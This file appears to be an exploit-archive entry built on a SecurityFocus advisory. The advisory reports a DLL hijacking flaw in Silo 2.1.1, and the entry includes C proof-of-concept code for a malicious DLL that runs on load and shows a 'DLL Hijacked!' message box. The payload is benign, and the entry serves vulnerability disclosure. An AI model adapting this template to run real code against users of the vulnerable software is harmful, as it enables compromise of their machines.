30 lines
No EOL
755 B
C
30 lines
No EOL
755 B
C
// source: https://www.securityfocus.com/bid/44726/info
|
|
|
|
Silo is prone to a vulnerability that lets attackers execute arbitrary code.
|
|
|
|
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
|
|
|
Silo 2.1.1 is vulnerable; other versions may also be affected.
|
|
|
|
#include <windows.h>
|
|
|
|
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
|
|
{
|
|
|
|
switch (fdwReason)
|
|
{
|
|
case DLL_PROCESS_ATTACH:
|
|
dll_mll();
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
case DLL_PROCESS_DETACH:
|
|
break;
|
|
}
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
int dll_mll()
|
|
{
|
|
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
|
|
} |